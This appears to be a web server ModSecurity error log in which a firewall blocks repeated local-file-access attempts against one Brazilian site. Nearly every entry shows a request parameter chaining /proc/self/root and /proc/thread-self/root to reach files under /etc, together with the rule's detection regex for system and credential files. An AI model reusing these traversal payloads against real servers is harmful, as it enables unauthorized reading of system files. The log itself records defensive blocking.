[Tue Mar 17 10:57:53.323434 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.243.203:59450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld4b-sgTmmJoPuMdynPgAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:54.543181 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.243.203:59452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld4u82sZHvlq4xgHrMVwAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:55.779757 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:59458] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld464xEDsg_V3ESNY8MwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:57.128982 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.243.203:59466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld5QeiSKl8TjouI-YJ0wAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:57:59.433899 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:59476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld564xEDsg_V3ESNY8NgAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:58:03.957916 2026] [:error] [pid 9498:tid 140411557287680] [client 74.7.241.46:35742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld63dMvNrBGNI28whf_QAAAxY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:58:06.802335 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.243.203:48856] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld7tCmCSWTlPouqorUwwAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:58:10.519534 2026] [:error] [pid 8555:tid 140411616036608] [client 74.7.243.203:48862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld8s36KAxay5pmeQfDUwAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:58:17.247547 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.243.203:58332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld-b-sgTmmJoPuMdynRgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:58:22.438150 2026] [:error] [pid 18604:tid 140411582465792] [client 74.7.243.203:58346] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abld_kBd0UqwxWindINw4gAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:58:40.344801 2026] [:error] [pid 18604:tid 140411616036608] [client 74.7.243.203:47850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableEEBd0UqwxWindINw9QAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:58:43.907175 2026] [:error] [pid 11293:tid 140411699963648] [client 74.7.241.46:60642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableE9CmCSWTlPouqorU6AAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:58:48.479079 2026] [:error] [pid 18709:tid 140411733534464] [client 74.7.243.203:40112] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableGDarLhPAjZGI1b22rAAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:58:57.759577 2026] [:error] [pid 17965:tid 140411565680384] [client 74.7.243.203:40114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableIat8Nd0UC_OcbVG49AAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:59:05.183100 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.241.46:55034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableKZqmL8PQht4WJFlQMQAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:59:09.477275 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:46316] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableLdCmCSWTlPouqorU8AAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:59:19.686006 2026] [:error] [pid 8856:tid 140411733534464] [client 74.7.244.31:43928] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ableN3UHeC6oxrTQ0VC3AwAAAcE"]
[Tue Mar 17 10:59:20.783534 2026] [:error] [pid 8856:tid 140411599251200] [client 74.7.241.46:41768] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableOHUHeC6oxrTQ0VC3BAAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:59:22.488354 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.241.46:34948] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableOqt8Nd0UC_OcbVG5AAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:59:40.207667 2026] [:error] [pid 8555:tid 140411607643904] [client 74.7.241.46:34954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableTM36KAxay5pmeQfDgwAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 10:59:47.526202 2026] [:error] [pid 2325:tid 140411741927168] [client 74.7.243.203:52716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableU-82sZHvlq4xgHrMlAAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:59:52.171617 2026] [:error] [pid 17965:tid 140411632822016] [client 74.7.241.46:40088] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ableWKt8Nd0UC_OcbVG5FAAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
